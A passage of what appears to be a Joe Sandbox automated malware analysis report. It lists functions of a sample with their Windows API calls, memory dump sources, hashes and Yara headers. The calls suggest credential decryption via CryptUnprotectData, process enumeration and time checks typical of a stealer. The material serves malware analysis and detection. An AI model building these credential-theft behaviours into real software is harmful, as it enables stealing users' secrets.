                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 6ef07471206c424d721999c1e671996d041b059f5c94d998f797857863883017
                              • Instruction ID: 3e806366da9f3beb4a3479076ea85cc39a05c58f9bbb171b0c03b0eb2b4b3b50
                              • Opcode Fuzzy Hash: 6ef07471206c424d721999c1e671996d041b059f5c94d998f797857863883017
                              • Instruction Fuzzy Hash: 1F418F7590421EDFCB20CF90D989BFEB7B8BF44304F1041A8E509A7284D7745A84DF91
                              Function 01006920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0100696C
                              • sscanf.NTDLL ref: 01006999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010069B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010069C0
                              • ExitProcess.KERNEL32 ref: 010069DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 8988028cfb893897a98df7d46e7c3e0c963a9d0528a370c582cb6faa9813eae8
                              • Instruction ID: 0d6163ae7cf657934ec788104a64ebe8b156c6f19ec19eae9051c47b6a29cdb6
                              • Opcode Fuzzy Hash: 8988028cfb893897a98df7d46e7c3e0c963a9d0528a370c582cb6faa9813eae8
                              • Instruction Fuzzy Hash: 99213EB5D10209ABDF04EFE4E949AEEB7B9FF48300F04852EE046E3244EB355604CB65
                              Function 00FF7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FF724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FF7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FF72A4
                              • LocalFree.KERNEL32(?), ref: 00FF72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 627bca2684ee4438e49848ec51c59470a7e3af217ce10d6f167de5ed2020ea38
                              • Instruction ID: 61b0e16a2ee540b2efac6f6be331c157be7c9d9083e434cedbb256e09c26c213
                              • Opcode Fuzzy Hash: 627bca2684ee4438e49848ec51c59470a7e3af217ce10d6f167de5ed2020ea38
                              • Instruction Fuzzy Hash: 90010075A40208BBEB24DB94DD4AFADB778BB44700F104158FB45EB2C4D670AA019B65
                              Function 01009600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0100961E
                              • Process32First.KERNEL32(01010ACA,00000128), ref: 01009632
                              • Process32Next.KERNEL32(01010ACA,00000128), ref: 01009647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0100965C
                              • CloseHandle.KERNEL32(01010ACA), ref: 0100967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: a7ca88999480a45b562e1b7878bba8fee2412accbf01035073021153f0be853a
                              • Instruction ID: fc6632bb3211cb83fcea9df360aecb91b23ca336348e6983acb6f4731f975d56
                              • Opcode Fuzzy Hash: a7ca88999480a45b562e1b7878bba8fee2412accbf01035073021153f0be853a
                              • Instruction Fuzzy Hash: E6010075A10208ABDB25DFA5DD48BDDBBF8EB4C704F004198A54AD7280DB349B40CF50
                              Function 01008EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00FF5184,40000001,00000000,00000000,?,00FF5184), ref: 01008EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 907110de3995f859af0350646c8560816cc0eab36575273d1aa26042ca41039c
                              • Instruction ID: 58e7daf8808cf342646316713d1e4ab18e84123aeb252269bd1b751ae9a1aa79
                              • Opcode Fuzzy Hash: 907110de3995f859af0350646c8560816cc0eab36575273d1aa26042ca41039c
                              • Instruction Fuzzy Hash: 1B110A70600205AFEB41CF64E888FBB33A9BF89300F00D459FA958B291D735E841DB60
                              Function 00FF9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 4a78520caa1c06c54d89defb7cbef3a3b3edc27a3bdb7a5e7c88f0758c9425e1
                              • Instruction ID: b36a797e57c16dacd246936c1b74c010e6dccfb68cb5384311e6157ef8720624
                              • Opcode Fuzzy Hash: 4a78520caa1c06c54d89defb7cbef3a3b3edc27a3bdb7a5e7c88f0758c9425e1
                              • Instruction Fuzzy Hash: 4111A4B4640208AFEB10CF64D899FAA77B5FB89710F208058FA159B3D4C7B5AA01DB50
                              Function 01007A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0198F760,00000000,?,01010E10,00000000,?,00000000,00000000), ref: 01007A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0198F760,00000000,?,01010E10,00000000,?,00000000,00000000,?), ref: 01007A7D
                              • wsprintfA.USER32 ref: 01007AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 5999ff9b2aa3972ee61f2ee0dcc9194565575f74eb27b867051d547420639eea
                              • Instruction ID: be244539f063034195fdad73371ee362fb1b0e22f720faee00764ddf0dea6477
                              • Opcode Fuzzy Hash: 5999ff9b2aa3972ee61f2ee0dcc9194565575f74eb27b867051d547420639eea
                              • Instruction Fuzzy Hash: 38118EB1945218EBEB208B94DC49FA9B7B8FB44721F0043AAE94A932C0C7781A84CF50
                              Function 013BFE86 Relevance: 5.8, Strings: 4, Instructions: 777COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1.v$Oqt~$](t{$e]u
                              • API String ID: 0-4114461045
                              • Opcode ID: 621f49fef06bc05e1d41ec4f101363ddd10fb5bb542c30f203b56178666581c7
                              • Instruction ID: 97a70cec39f260b1173871aad14ce3979f82efa03d4be22513787cff2c7cd66d
                              • Opcode Fuzzy Hash: 621f49fef06bc05e1d41ec4f101363ddd10fb5bb542c30f203b56178666581c7
                              • Instruction Fuzzy Hash: 4732D5F360C6049FE304AE2DEC8577AFBE9EF98320F16892DE6C5C7344EA3558118656
                              Function 01003720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0100E118,00000000,00000001,0100E108,00000000), ref: 01003758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 010037B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 221fdf171c6bb866fe8064e0e7082d42197e62d5b1bce932c5aec6f1141221c4
                              • Instruction ID: d31b120520cf410393158ded4be5ed0cde9f18a8723357511918885586494ac6
                              • Opcode Fuzzy Hash: 221fdf171c6bb866fe8064e0e7082d42197e62d5b1bce932c5aec6f1141221c4
                              • Instruction Fuzzy Hash: 6D41F870A00A289FEB25DB58CC95BDBB7B4BB48702F4041D9E609EB2D0D7B16E85CF50
                              Function 00FF9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF9BA3
                              • LocalFree.KERNEL32(?), ref: 00FF9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: da740208e4c7c495a8c5619eeaf3a24176b3617a97618bc26d49e20aa9b4ff64
                              • Instruction ID: af93884fbc1422d1f2dc3481eb10cfd868c0e31f7819f4d3e60bacf3334f8f72
                              • Opcode Fuzzy Hash: da740208e4c7c495a8c5619eeaf3a24176b3617a97618bc26d49e20aa9b4ff64
                              • Instruction Fuzzy Hash: 6D11CCB8A00209DFDB04DF94D989AAE77B5FF88300F104568E915A7354D774AE10CF61
                              Function 013C93C3 Relevance: 4.1, Strings: 2, Instructions: 1590COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 57??$M=D
                              • API String ID: 0-3615813599
                              • Opcode ID: 1a945ca96a57811f196086ef3a414d1ab209d5321816693f2ada98d0ed206661
                              • Instruction ID: b237d58a7f449647eca9e88b28df94a99272bd88a31a762bd4bc7aac4d309b10
                              • Opcode Fuzzy Hash: 1a945ca96a57811f196086ef3a414d1ab209d5321816693f2ada98d0ed206661
                              • Instruction Fuzzy Hash: D3B2E7F36082009FE304AE2DDC8567AFBE9EFD4720F1A893DE6C5C7744EA3558018696
                              Function 013CD3CC Relevance: 2.1, Strings: 1, Instructions: 815COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
